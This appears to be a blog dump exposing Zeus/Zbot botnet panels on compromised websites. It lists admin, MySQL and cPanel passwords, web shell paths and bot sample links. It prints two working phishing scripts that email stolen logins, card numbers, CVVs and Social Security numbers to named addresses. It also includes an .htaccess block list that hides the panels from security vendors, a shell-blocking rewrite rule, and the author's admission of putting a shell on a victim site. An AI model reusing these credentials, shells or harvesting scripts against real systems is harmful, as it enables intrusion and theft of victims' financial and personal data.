Zeus - berizka.gorodok.km.ua - Botnet

// mysql config from bot 
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'berizka_image';
$config['mysql_pass']          = 'olaoluwa!@#';
$config['mysql_db']            = 'berizka_image';
// zeus panel 
hxxp://berizka.gorodok.km.ua/core/auth/image/cp.php
admin:dragob

Zeus Citadel - 65.200.132.20 - Botnet

the admin ....

// panel 
http://65.200.132.20/webalizer/webdav/cp.php
admin:govno
// email used for phishing 
kotak4amal@gmail.com
// scan4you account and jabber
  'scan4you_jid' => 'uznik15@jabber.ru',
  'scan4you_id' => '29719',
  'scan4you_token' => 'd47310b2beea51ec546e',
// m.php
<?include 'images/validate_form.js';



$ip = getenv("REMOTE_ADDR");

$message .= "-------- XxX  *~* Mr-Lordz *~*  XxX-------\n";

$message .= "User-ID: ".$_POST['user']."\n";

$message .= "Password: ".$_POST['passwd']."\n";

$message .= "IP: ".$ip."\n";

$message .= "-------------Created By Mr-lordz--------------\n";



$recipient = "kotak4amal@gmail.com";

$subject = "ComCastID ~ $ip";

$headers = "From: ";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

mail($recipient,$subject,$message,$headers);

     if (mail($recipent,$subject,$message,$headers))

       {

           header("Location: billing.htm");



       }

else

           {

         echo "ERROR! Please go back and try again.";

         }



?> 

Zeus - sip1distribution.com - Botnet

Some photos of the admin ..

 

// admin ip 
hxxp://www.utrace.de/?query=41.79.219.204
// zeus panel 
admin:thankgod123
hxxp://sip1distribution.com/.zerd/cp.php
// mysql 
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'sip1dist_admin';
$config['mysql_pass']          = 'thankgod123';
$config['mysql_db']            = 'sip1dist_admin';

Zbot - kihsmalta.com - Hacked

// http://urlquery.net/report.php?id=1415211438936

// zeus panel 
hxxp://kihsmalta.com/cp.php

// .htacces file
deny from quttera.com
deny from hosts-file.net
deny from amada.abuse.ch
deny from palevotracker.abuse.ch
deny from blogger.com
deny from phishtank.com
deny from netcraft.com
deny from google.com
deny from yahoo.com
deny from malwared.ru
deny from malware.com.br
deny from malekal.com
deny from k7computing.com 
deny from gdata.com
deny from gdatasoftware.com
deny from fortinet.com
deny from emsisoft.com
deny from quttera.com
deny from opera.com
deny from infospyware.com
deny from .................... etc 

 allow from all

 allow from all
 
# Block shell uploaders, htshells, and other baddies
RewriteCond %{REQUEST_URI} ((php|my|bypass)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|c100|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_URI} (\.exe|\.php\?act=|\.tar|_vti|afilter=|algeria\.php|chbd|chmod|cmd|command|db_query|download_file|echo|edit_file|eval|evil_root|exploit|find_text|fopen|fsbuff|fwrite|friends_links\.|ftp|gofile|grab|grep|htshell|\ -dump|logname|lynx|mail_file|md5|mkdir|mkfile|mkmode|MSOffice|muieblackcat|mysql|owssvr\.dll|passthru|popen|proc_open|processes|pwd|rmdir|root|safe0ver|search_text|selfremove|setup\.php|shell|ShellAdresi\.TXT|spicon|sql|ssh|system|telnet|trojan|typo3|uname|unzip|w00tw00t|whoami|xampp) [NC,OR]
RewriteCond %{QUERY_STRING} (\.exe|\.tar|act=|afilter=|alter|benchmark|chbd|chmod|cmd|command|cast|char|concat|convert|create|db_query|declare|delete|download_file|drop|edit_file|encode|environ|eval|exec|exploit|find_text|fsbuff|ftp|friends_links\.|globals|gofile|grab|insert|localhost|logname|loopback|mail_file|md5|meta|mkdir|mkfile|mkmode|mosconfig|muieblackcat|mysql|order|passthru|popen|proc_open|processes|pwd|request|rmdir|root|scanner|script|search_text|select|selfremove|set|shell|sql|sp_executesql|spicon|ssh|system|telnet|trojan|truncate|uname|union|unzip|whoami) [NC] 
RewriteRule .* - [F]

/// extracted from xylitolMalware family    ZEUS
MD5    8f6b9dbfb715c4a8166401e6fc511964
Version    2.1.0.1
RC4 Keystream    21db88b013ff66617997a990f083df91ac7327b64287569a376a5a63ee4abf234da43d2e758644c919788bc09200957d7b04084fa6dc1503e753f50257f10b121caea254c5be6d55fbaa07d21b777e2a67100ff27c6072d343ca9dbc80eb2f2ccd5293711ae6d9c365b5f8f3ddd83550189c3a418a8c9406b96bce25cb38d4d0695f8999e8d7fa0c013c2833e5a5cfcc5e14c61e816ca04bb2c1bac776170adaf451322d40e9e2ef3ea3bb11456fe1d5294e0eea1dfc85b38df9d659393174263447b4ec5b84f70d58deb85ca798c848c28e05f67ae39bed9f647062e47f682b209609c4fe6eb11f4caf8f22d1a182a8abb73f3b1624fd36465dbdad309ee049

Zbot - motoecarro.com.br - Hacked

// mysql
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'motoecar_1';
$config['mysql_pass']          = 'J31OIPuOLSf$';
$config['mysql_db']            = 'motoecar_1';

// zeus panel 
hxxp://motoecarro.com.br/images/cp.php
user : admin
pass : 123456  

// config.bin
hxxp://motoecarro.com.br/images/config.bin

Zbot - menumaterno.com.br - Hacked

$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'materno_labe';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'materno_labe';

// hxxp://menumaterno.com.br/skins/tango/thumb.php [shell]

// zeus panel 
hxxp://menumaterno.com.br/skins/tango/_labe/cp.php?m=home
user : admin
pass : 1qaz2wsx

[cpan]
password=provnet13
user=materno

Zbot - e-rbi.org - Hacked

hxxp://e-rbi.org/03/serverphp/cp.php

All info ( php shell , zeus panel ) conntact me at my email !!

Zbot - www.oei.org.ar - Hacked

//report
hxxps://zeustracker.abuse.ch/monitor.php?host=www.oei.org.ar
// interesting script "cn.pl" found at 
/home/oeiorgar/cn.pl
// http://pastebin.com/y5CYspZG

all information ( shell path , zeus panel and other ) conntact me at email !!

Zeus - Spamers Network

A follower asked to post this. But now im still working on that many more 
samples inside, gone post it soon ..

Phishing - bristolbathroomstore.co.uk - Exposed

Today i just checked my spam mail and saw this mail 

It say's that my card has been suspended and an error deleted all information !! so i clicked the link and moved to this page

It want all security info from me including card number and pin .
I entered some trash info and submited it , then the script "Perfect.php" came in action and moved me to visa website . So but lets take a look at the url :

hxxp://www.bristolbathroomstore.co.uk/uploads/news/%20vbv.USA/your%20account/index.html 

also visa move to the "bristol bathroom store" website LOL

also i put a shell on it just to look at the file "Perfect.php"

<?php
$ip = getenv("REMOTE_ADDR");
$J7 = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=$ip");
$CNCD = $J7->geoplugin_countryCode ; // Country
$STCD = $J7->geoplugin_regionCode ; //  State
$hostname = gethostbyaddr($ip);
$message .= "-----------------[ReZuLt]-------------------\n";
$message .= "First name                     : ".$_POST['nom']."\n";
$message .= "Last name                  : ".$_POST['nom0']."\n";
$message .= "Adress Line 1 : ".$_POST['address1']."\n";
$message .= "Adress Line 2 : ".$_POST['address2']."\n";
$message .= "Town/City : ".$_POST['city']."\n";
$message .= "Pastcode : ".$_POST['zip']."\n";
$message .= "Date dnaissance   : ".$_POST['l_civil0']."/".$_POST['l_civil1']."/".$_POST['l_civil2']."\n";
$message .= "Non d j f      : ".$_POST['adresse']."\n";
$message .= "Social Security Number : ".$_POST['ssn1']."/".$_POST['ssn2']."/".$_POST['ssn3']."\n";
$message .= "Type de carte  : ".$_POST['l_civil3']."\n";include 'Perfect/visa.css';
$message .= "numero carte   : ".$_POST['ccnum']."\n";
$message .= "Date d'expir   : ".$_POST['mois']."/".$_POST['annee']."\n";
$message .= "cvv2           :".$_POST['cvv2']."\n";
$message .= "---------------------------------------------\n";
$message .= "IP Address : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$timedate = $_POST['historys'];
$rnessage  = "$message\n";
$message .= "-------------------+ Created in 2014 [ Dj0ui ] +--------------------\n";
$send="mamine.boujneh@live.fr"; // 
$subject = "CC VBV ReZulT | Fallega |  ~>| $CNCD | $STCD | Fr0m $ip";
$headers = "From:Fallega~<mamine.boujneh@live.fr>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$rnessage,$headers);
mail("mamine.boujneh@live.fr",$subject,$rnessage,$headers);
header("Location:  https://usa.visa.com/personal/security/vbv/index.html");
?>

all the data collected go to his mail address , also if u enter in on facebook give you interesting information .

Zbot - optometriaortopticamendezronderos.com - Hacked

$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'optometr_server';
$config['mysql_pass']          = '123qwe';
$config['mysql_db']            = 'optometr_server';
// hxxp://optometriaortopticamendezronderos.com/css/upload/login/cp.php?m=login
user : admin
pass(md5) : 786b754d2b4902cb348bb59d7cff0004
pass : alexgrema

// second zbot panel (index)
// hxxp://optometriaortopticamendezronderos.com/css/index/cp.php?m=login
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'optometr_ff';
$config['mysql_pass']          = '123qwe';
$config['mysql_db']            = 'optometr_ff';

user : admin
pass(md5) : fc7d1bcf2447219eb208b96aa3d0a58c
pass : salamsalam

// zip file found on server 
hxxps://www.sendspace.com/file/s3k9i8

Zbot - peterpanaupairs.co.uk - Login

 // zeus panel 
hxxp://www.peterpanaupairs.co.uk/duff/duff/30/cp.php
user : admin
pass : admin88

// bot sample
hxxps://www.sendspace.com/file/t29i3e

Zbot - dairyforsale.com.au - Hacked

hxxp://dairyforsale.com.au/images/roy/cp.php

// config
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'dairy_roy';
$config['mysql_pass']          = 'thankgod123';
$config['mysql_db']            = 'dairy_roy';

// zeus panel
user : admin
pass : 12345678

// shell 
hxxp://dairyforsale.com.au/cache/m.php

// cpanel 
user = 'dairy';
pass = 'vatbuster';